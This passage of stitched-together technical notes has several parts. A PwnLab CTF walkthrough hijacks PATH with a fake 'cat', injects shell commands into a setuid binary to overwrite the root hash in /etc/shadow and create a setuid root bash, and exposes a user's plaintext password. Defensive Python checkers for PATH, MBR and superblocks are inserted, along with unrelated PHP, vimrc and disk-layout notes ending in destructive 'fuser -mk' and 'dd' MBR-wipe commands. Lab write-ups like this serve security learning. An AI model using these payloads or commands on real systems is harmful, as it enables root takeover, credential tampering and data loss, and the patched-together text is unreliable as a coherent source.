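    """Constructed sample tree (temporary directory, removed afterwards): a packaged
    setuid binary, a user-owned setuid+setgid helper in a home directory, and a
    world-writable non-setuid file. The current user stands in for root."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "usr/bin"))
        os.makedirs(os.path.join(root, "home/kane"))
        for rel, mode in (("usr/bin/passwd", 0o4755),
                          ("home/kane/msgmike", 0o6755),
                          ("home/kane/cat", 0o777)):
            p = os.path.join(root, rel)
            with open(p, "w") as fh:
                fh.write("#!/bin/sh\n")  # placeholder contents, not a real binary
            os.chmod(p, mode)
        # strip the temp root so the paths look like the absolute ones find prints
        entries = [(p[len(root):], uid, mode) for p, uid, mode in find_suid(root)]
        return triage_suid(entries, baseline=("/usr/bin/passwd",), root_uid=os.getuid())
```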

Rough analysis of msgmike

[raw bytes of the msgmike ELF elided; the readable strings it contains include: /lib/ld-linux.so.2, cat /home/mike/msg.txt, GCC: (Debian 4.9.2-10) 4.9.2, msgmike.c, setreuid@@GLIBC_2.0, setregid@@GLIBC_2.0, system@@GLIBC_2.0, __libc_start_main@@GLIBC_2.0]
It contains the string cat /home/mike/msg.txt, which should be the command it wraps

Its owner is mike

The history contains this line

export PATH=./:$PATH

So we construct the equivalent

export PATH=/home/kane:$PATH

kane@pwnlab:~$ echo $PATH
echo $PATH
/home/kane:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games

Check the permissions of the first directory in PATH

kane@pwnlab:/usr/local$ ls -lad bin
ls -lad bin
drwxrwsr-x 2 root staff 4096 Mar 17 2016 bin

Modify the cat file in the current directory

kane@pwnlab:~$ echo "/bin/bash;ls " > cat

Run ./msgmike again

kane@pwnlab:~$ ./msgmike
./msgmike
mike@pwnlab:~$
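An added example, not from the original write-up: a Python check for the PATH weakness this step relies on, a search directory that an unprivileged user can write to (/home/kane, prepended above) or that is group-writable (the drwxrwsr-x root staff listing of /usr/local/bin above). The directory table is constructed to match the listings on this page; live_lookup runs the same check against the real filesystem.

```python
import os
import stat

# Constructed lookup table (not taken from a live system) mirroring the box:
# directory -> (owner uid, permission bits). /usr/local/bin is drwxrwsr-x root staff,
# i.e. group-writable, exactly as the ls -lad above shows.
SAMPLE_DIRS = {
    "/home/kane": (1000, 0o750),
    "/usr/local/bin": (0, 0o2775),
    "/usr/bin": (0, 0o755),
    "/bin": (0, 0o755),
    "/usr/local/games": (0, 0o2775),
    "/usr/games": (0, 0o755),
}


def audit_path(path_value, lookup):
    """Return {entry: [problems]} for a PATH string.
    lookup(directory) must return (uid, mode_bits) or None if it does not exist."""
    problems = {}
    for entry in path_value.split(":"):
        issues = []
        if entry in ("", ".") or entry.startswith("./"):
            # an empty field, "." and "./" all make the shell search the current directory
            issues.append("resolves to the current directory")
        elif not os.path.isabs(entry):
            issues.append("relative entry")
        else:
            info = lookup(entry)
            if info is None:
                issues.append("does not exist")
            else:
                uid, mode = info
                if uid != 0:
                    issues.append("owned by uid %d, not root" % uid)
                if mode & stat.S_IWGRP:
                    issues.append("group-writable")
                if mode & stat.S_IWOTH:
                    issues.append("world-writable")
                if entry.startswith(("/home/", "/tmp", "/var/tmp")):
                    issues.append("lives under a user-controlled tree")
        if issues:
            problems[entry] = issues
    return problems


def live_lookup(directory):
    """lookup() backed by the running system, for auditing a real $PATH."""
    try:
        st = os.stat(directory)
    except OSError:
        return None
    return st.st_uid, stat.S_IMODE(st.st_mode)


def audit_current_path():
    """Audit the PATH of the current process against the live filesystem."""
    return audit_path(os.environ.get("PATH", ""), live_lookup)
```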

Now there is a SUID file owned by root; same routine as above

mike@pwnlab:/home/mike$ ls -la
ls -la
total 28
drwxr-x--- 2 mike mike 4096 Mar 17 2016 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw-r--r-- 1 mike mike 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 mike mike 3515 Mar 17 2016 .bashrc
-rwsr-sr-x 1 root root 5364 Mar 17 2016 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 2016 .profile

Run it once

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: flag{T5566Y}
flag{T5566Y}
flag{T5566Y}

Copy it to /tmp and inspect the contents with AntSword

The embedded command is presumably
/bin/echo %s >> /root/messages.txt

The source is presumably something like

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void){
// printf("helloworld\n");
char a[256];
// read one line of the message; the original sketch used scanf("%c",&a), which reads a single character
if (fgets(a, sizeof a, stdin) == NULL)
return 1;
a[strcspn(a, "\n")] = '\0';
// printf(a);
char s[500];
// the message is spliced unquoted into a shell command line, so shell metacharacters in it are interpreted
snprintf(s, sizeof s, "/bin/echo %s >> /root/messages.txt", a);
// system("/bin/echo %s >> /root/messages.txt",a);
printf("%s\n",s);
system(s);
// printf("%s\n",a );
return 0;
}

a;sed -i 's@^root.*@root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g$' /etc/shadow;echo 0

/bin/echo "";sed "s@^root.*@root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:18042:0:99999:7:::@g" /etc/shadow;echo "hello" >> /root/messages.txt
a;a=\";echo $a;echo a

From the sed attempt it is clear that the input is echoed back verbatim. But what if the input contains backticks?

`/bin/bash`

The attempt above has no effect

No luck. Late at night I decided to just do it the honest way with an ordinary command

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: "";grep "root" /etc/shadow;echo ""
"";grep "root" /etc/shadow;echo ""

root:$6$aYZMZ3V0$qAYwiR7aanVmKSWyV5IbRffspdjFx4xhLrm8kbHhh1DG16Bdb0/ptImcDK2uT.6xc/FZotacYr0X4dB0SurjD/:16877:0:99999:7:::

# root:$6$k/mtF8Ic$.whWyn0EQI4q3rucHh3iYK.E6gTmbG3l1KoaQpnFrvs.bD2gw.JCvip1Jt4As5Vz7XKvgWAOz0L/iwaM2aDwp/:16877:0:99999:7:::

mike@pwnlab:/home/mike$ ./msg2root
./msg2root
Message for root: "";cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo ""
"";cp /bin/bash /home/kane/sh;chmod +s /home/kane/sh;echo ""


mike@pwnlab:/home/mike$ cd
cd
mike@pwnlab:~$ ls
ls
cat flag_wrong.txt msgmike sh tq
mike@pwnlab:~$ ls -la
ls -la
total 1160
drwxr-x--- 2 kane kane 4096 May 26 17:47 .
drwxr-xr-x 6 root root 4096 Mar 17 2016 ..
-rw------- 1 kane kane 1245 May 26 10:36 .bash_history
-rw-r--r-- 1 kane kane 220 Mar 17 2016 .bash_logout
-rw-r--r-- 1 kane kane 3515 Mar 17 2016 .bashrc
-rwxrwxrwx 1 kane kane 14 May 26 17:01 cat
-rw-r--r-- 1 root root 13 Apr 25 10:32 flag_wrong.txt
-rwsr-sr-x 1 mike mike 5148 Mar 17 2016 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 2016 .profile
-rwsr-sr-x 1 root root 1105840 May 26 17:47 sh
-rwsr-sr-x 1 root root 38868 May 26 17:42 tq
mike@pwnlab:~$ sh
sh
sh-4.3# whoami
whoami
root
sh-4.3#

Source /etc/bash.bashrc, /etc/profile, /root/.profile and /root/.bashrc, then force-edit /etc/shadow with vi; login succeeds

root@pwnlab:/home/kane# id
id
uid=0(root) gid=0(root) groups=0(root)
root@pwnlab:~# cat flag.txt
cat flag.txt
.-=~=-. .-=~=-.
(__ _)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(__ _)
(_ ___) _____ _ (_ ___)
(__ _) / __ \ | | (__ _)
( _ __) | / \/ ___ _ __ __ _ _ __ __ _| |_ ___ ( _ __)
(__ _) | | / _ \| '_ \ / _` | '__/ _` | __/ __| (__ _)
(_ ___) | \__/\ (_) | | | | (_| | | | (_| | |_\__ \ (_ ___)
(__ _) \____/\___/|_| |_|\__, |_| \__,_|\__|___/ (__ _)
( _ __) __/ | ( _ __)
(__ _) |___/ (__ _)
(__ _) (__ _)
(_ ___) If you are reading this, means that you have break 'init' (_ ___)
( _ __) Pwnlab. I hope you enjoyed and thanks for your time doing ( _ __)
(__ _) this challenge. (__ _)
(_ ___) (_ ___)
( _ __) Please send me your feedback or your writeup, I will love ( _ __)
(__ _) reading it (__ _)
(__ _) (__ _)
(__ _) For sniferl4bs.com (__ _)
( _ __) claor@PwnLab.net - @Chronicoder ( _ __)
(__ _) (__ _)
(_ ___)-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-=-._.-(_ ___)
`-._.-' `-._.-'
root@pwnlab:~#
python -c "import pty;pty.spawn('/bin/rbash')"
su kane -c "iSv5Ym2GRo"
cd /home/kane
export PATH=/home/kane:$PATH
echo "/bin/bash;ls " > cat
./msgmike

Unlimited nested categories

Unlimited nesting works like path lookup in a Linux filesystem. The table design reduces to: id -> the row id; pid -> the parent id

A more advanced layout that also makes lookups easier adds one more column: path -> the chain of ancestor ids, recorded recursively up to the root

public function add(){  // controller action that receives the POST parameters
    $name = trim($_POST['name']);
    $pid  = isset($_POST['pid']) ? (int) trim($_POST['pid']) : 0;

    if ($pid != 0) {
        // walk up through the parents, prepending each ancestor id to build the path
        $path = '';
        $cur  = $pid;
        do {
            $row  = db('goods')->where(['id' => $cur])->find();
            $path = $cur . ',' . $path;
            $cur  = $row ? (int) $row['pid'] : 0;
        } while ($cur != 0);
        $id = db('goods')->save(['name' => $name, 'pid' => $pid, 'path' => $path]);
    } else {
        // no pid supplied: this is a root category, so path keeps its default of zero
        $id = db('goods')->save(['name' => $name, 'pid' => 0]);
    }
    return $id;
}

.vimrc

syntax enable
set t_Co=256
set background=dark
let g:solarized_termtrans = 1 " needed under X windows: transparency and similar effects wash vim out to grey; this line fixes it
colorscheme solarized

Hard disks

Mechanical hard disks

Made up of platters and heads; the disk is divided into sectors. A mechanical disk may consist of several platters. The sectors at the same position on every platter, each 512 bytes, together form a hollow cylinder, which is called a cylinder. For fast reads and writes the drive usually has several heads writing to several platters at once, so a single file is written across multiple platters

Low-level formatting

Lays out the tracks and sectors

Track

Each ring the head sweeps over the platter is a track; every track is divided into a number of sectors.

Sector

A sector is 512 bytes. Historically every sector was 512 bytes, but as the technology developed the conventional sector size became 4096 bytes. For compatibility with older operating systems the disk is allowed to present each 4096-byte sector as eight virtual 512-byte sectors. If all data is written starting from the first 512 bytes of a 4096-byte sector, rather than somewhere in the remaining 3584 bytes, that is called 4K alignment; starting from one of the other seven virtual sectors is 4K misalignment. 4K alignment has many benefits, for example faster writes: the larger the sector, the fewer sectors there are, so when data larger than one sector is stored across several blocks the operating system has fewer sectors to locate and the data is stored faster. Still using 512 bytes per block/cluster makes writes extremely slow

Cylinder

Every disk has many platters that can be written simultaneously, which speeds up writes; the drawback is that once one platter is damaged the data of the whole disk is damaged, because the entire cylinder becomes unusable

Block

On Windows data is stored in units of clusters, on Linux in units of blocks (different names, same meaning). The system defines how many sectors make up a cluster (block); since a sector is 512 bytes, a cluster (block) must be an integer multiple of the sector size. Common cluster (block) sizes are 1024, 2048 and 4096 bytes (4K is the most common); each block/cluster consists of 2^n sectors

Master boot record (MBR)

Cylinder 0, sector 0, 512 bytes: the master boot record. This space is divided into three parts. 446 bytes: the bootloader, a piece of code that loads the kernel from a partition. 64 bytes: the partition table, 16 bytes per partition entry, at most four partitions (16 bytes × 4). 2 bytes: the magic number, marking whether the MBR is valid

Boot process

The motherboard powers up, the BIOS is read into memory and the CPU executes it; once the BIOS self-test completes it follows the user-defined boot order and starts looking for an MBR on disk. When a valid MBR is found, the BIOS loads the bootloader stored in the MBR into memory, the BIOS exits and the bootloader runs. It finds the predefined partition, locates the operating system kernel, loads it into memory, decompresses it and runs it from memory; the bootloader exits and the kernel takes over. The kernel is loaded into the privilege level 0 region

Understanding the Linux boot process in depth; how the Linux kernel is loaded; initrd and initramfs

Extended partition

Recorded in the disk's MBR as a pointer to another location, used to chain the extended partition
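An added example, not from the original notes: a Python parser for the MBR layout described above (446-byte bootloader, four 16-byte partition entries, 2-byte signature) that also reports the extended-partition container and whether each partition starts 4K-aligned in the sense of the sector section. The partition-entry field layout and the 0x05/0x0F extended types are standard MBR facts, not from this page; the sample image is constructed.

```python
import struct

SECTOR_SIZE = 512
BOOTLOADER_SIZE = 446                  # bytes 0-445: boot code
PARTITION_ENTRY_SIZE = 16              # bytes 446-509: four 16-byte partition entries
MBR_SIGNATURE = b"\x55\xaa"            # bytes 510-511: the "magic number" marking a valid MBR
EXTENDED_TYPES = {0x05, 0x0F}          # DOS / LBA extended-partition containers
SECTORS_PER_4K = 4096 // SECTOR_SIZE   # eight 512-byte logical sectors per 4 KiB physical sector


def is_valid_mbr(sector):
    """True if the sector carries the 0x55AA signature (a wiped first sector does not)."""
    return len(sector) == SECTOR_SIZE and sector[510:512] == MBR_SIGNATURE


def parse_mbr(sector):
    """Decode one 512-byte MBR into its bootloader bytes and partition entries."""
    if not is_valid_mbr(sector):
        raise ValueError("not a valid MBR: wrong length or signature missing")
    partitions = []
    for i in range(4):
        off = BOOTLOADER_SIZE + i * PARTITION_ENTRY_SIZE
        # entry layout: status, CHS start (3 bytes), type, CHS end (3 bytes), LBA start, sector count
        status, _chs_start, ptype, _chs_end, lba, count = struct.unpack_from("<B3sB3sII", sector, off)
        if ptype == 0:
            continue                     # unused slot
        partitions.append({
            "slot": i + 1,
            "bootable": status == 0x80,
            "type": ptype,
            "extended": ptype in EXTENDED_TYPES,
            "lba_start": lba,
            "sectors": count,
            "aligned_4k": lba % SECTORS_PER_4K == 0,
        })
    return {"bootloader": sector[:BOOTLOADER_SIZE], "partitions": partitions}


def read_mbr(path):
    """Read the first sector of a block device or image (the bytes that dd bs=512 count=1 wipes)."""
    with open(path, "rb") as fh:
        return parse_mbr(fh.read(SECTOR_SIZE))


def _entry(status, ptype, lba, count):
    # CHS fields carry the conventional 0xFE 0xFF 0xFF "use LBA" filler
    return struct.pack("<B3sB3sII", status, b"\xfe\xff\xff", ptype, b"\xfe\xff\xff", lba, count)


def sample_mbr():
    """Constructed MBR: a bootable Linux partition starting at LBA 2048 (4K-aligned),
    an extended container starting at LBA 4095 (misaligned), and two empty slots."""
    table = _entry(0x80, 0x83, 2048, 204800) + _entry(0x00, 0x05, 4095, 204800) + b"\x00" * 32
    return b"\x00" * BOOTLOADER_SIZE + table + MBR_SIGNATURE
```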

Partition

A disk is divided into a number of logical blocks; each partition is identified by a label such as sdX

High-level formatting

Creates the filesystem, with mke2fs

Filesystem

Also a program of sorts; it is responsible for creating, deleting, modifying and looking up files. A filesystem has several parts: the boot area, the super block, the inode pool and the data area

inode

An inode records a file's attributes, including modification time, creation time, the locations of the file's data blocks, the hard-link count, permissions, UID, GID and so on, but not the file name; file names are recorded by directories. For details download the Linux kernel source: struct inode under include/linux is declared in full there

inode table

The area of the filesystem set aside for storing inodes. Each inode is typically 128 or 256 bytes; the number of inodes is fixed when the filesystem is created, generated at a certain ratio, for example one inode per two blocks

Bitmap

Uses 1/0 to record whether each block is in use; the point is to let the operating system recognise unused resources easily and look them up quickly. block bitmap: records block usage; inode bitmap: records inode usage

Super block

Counting the first byte of the partition as byte 0, the superblock is the stretch of data starting at byte 1024. Its contents are the control information of the volume, effectively the volume's resource table; most of the information about the volume is kept here, for example the block size of the partition, how many block groups the partition has, and how many inodes each block group holds. The superblock has backups, written into several blocks when the filesystem is created; if the partition's superblock is damaged, it can be restored from a backup
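As an added example not in the original notes, a Python reader for the ext2/3/4 superblock that sits at byte 1024: it extracts the block size, block-group count and inodes per group mentioned above and lists the block numbers where the superblock copies live. The field offsets, the 0xEF53 magic and the sparse_super backup rule come from the ext2 on-disk format, not from this page; the image is constructed.

```python
import struct

SUPERBLOCK_OFFSET = 1024          # byte 0 is the start of the partition; the superblock begins at byte 1024
SUPERBLOCK_SIZE = 1024
EXT2_SUPER_MAGIC = 0xEF53         # s_magic, 16-bit little-endian at offset 56 of the superblock
RO_COMPAT_SPARSE_SUPER = 0x0001   # bit in s_feature_ro_compat (offset 100): backups only in some groups


def parse_superblock(image):
    """Decode the primary ext2/3/4 superblock from a raw partition image (bytes)."""
    sb = image[SUPERBLOCK_OFFSET:SUPERBLOCK_OFFSET + SUPERBLOCK_SIZE]
    if len(sb) < SUPERBLOCK_SIZE:
        raise ValueError("image too small to contain a superblock")
    (magic,) = struct.unpack_from("<H", sb, 56)
    if magic != EXT2_SUPER_MAGIC:
        raise ValueError("bad magic 0x%04x: not an ext superblock, or it is damaged" % magic)
    (inodes_count, blocks_count, _reserved, _free_blocks, _free_inodes,
     first_data_block, log_block_size) = struct.unpack_from("<7I", sb, 0)
    (blocks_per_group,) = struct.unpack_from("<I", sb, 32)
    (inodes_per_group,) = struct.unpack_from("<I", sb, 40)
    (ro_compat,) = struct.unpack_from("<I", sb, 100)
    return {
        "block_size": 1024 << log_block_size,
        "blocks_count": blocks_count,
        "inodes_count": inodes_count,
        "first_data_block": first_data_block,
        "blocks_per_group": blocks_per_group,
        "inodes_per_group": inodes_per_group,
        "block_groups": -(-blocks_count // blocks_per_group),   # ceiling division
        "sparse_super": bool(ro_compat & RO_COMPAT_SPARSE_SUPER),
    }


def superblock_block_numbers(info):
    """Block numbers holding a superblock copy: the primary (group 0) plus the backups
    that e2fsck -b can be pointed at when the primary is damaged."""
    groups = info["block_groups"]
    if info["sparse_super"]:
        wanted = {0, 1}                  # plus every power of 3, 5 and 7 below the group count
        for base in (3, 5, 7):
            power = base
            while power < groups:
                wanted.add(power)
                power *= base
    else:
        wanted = set(range(groups))      # every group carries a copy
    return [info["first_data_block"] + g * info["blocks_per_group"]
            for g in sorted(wanted) if g < groups]


def sample_image():
    """Constructed 2 KiB image (not a real filesystem): 1 KiB boot area followed by a
    superblock describing 1 GiB of 4 KiB blocks, 32768 blocks and 8192 inodes per group."""
    sb = bytearray(SUPERBLOCK_SIZE)
    struct.pack_into("<7I", sb, 0, 65536, 262144, 13107, 200000, 65000, 0, 2)
    struct.pack_into("<I", sb, 32, 32768)
    struct.pack_into("<I", sb, 40, 8192)
    struct.pack_into("<H", sb, 56, EXT2_SUPER_MAGIC)
    struct.pack_into("<I", sb, 100, RO_COMPAT_SPARSE_SUPER)
    return b"\x00" * SUPERBLOCK_OFFSET + bytes(sb)
```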

VFS

A coordinator across different filesystems that presents a single unified interface

Partitioning command

fdisk <disk>; m shows the available operations

Safely unmounting a disk

First kill every process running on the partition

fuser -mk <mount point>

Repartitioning

First wipe all information in the disk's first sector (the MBR)

dd if=/dev/zero of=<disk device> bs=512 count=1